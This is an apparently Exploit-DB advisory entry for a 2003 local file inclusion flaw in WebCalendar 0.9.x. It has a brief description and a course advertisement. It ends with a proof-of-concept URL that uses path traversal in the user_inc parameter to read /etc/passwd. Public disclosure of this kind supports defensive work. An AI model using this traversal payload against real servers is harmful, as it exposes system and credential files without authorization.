WebCalendar 0.9.x - Local File Inclusion Information Disclosure

EDB-ID:

22942

CVE:





Platform:

PHP

Date:

2003-07-21


Become a Certified Penetration Tester

Enroll in Advanced Web Attacks and Exploitation , the course required to become an Offensive Security Web Expert (OSWE)

GET CERTIFIED

source: https://www.securityfocus.com/bid/8237/info

It has been reported that an information disclosure issue exists in WebCalendar. This may allow an attacker to gain unauthorized read access to potentially sensitive information with the privileges of the web server process.

http://www.example.com/webcalendar/[filename].php?user_inc=../../../../../etc/passwd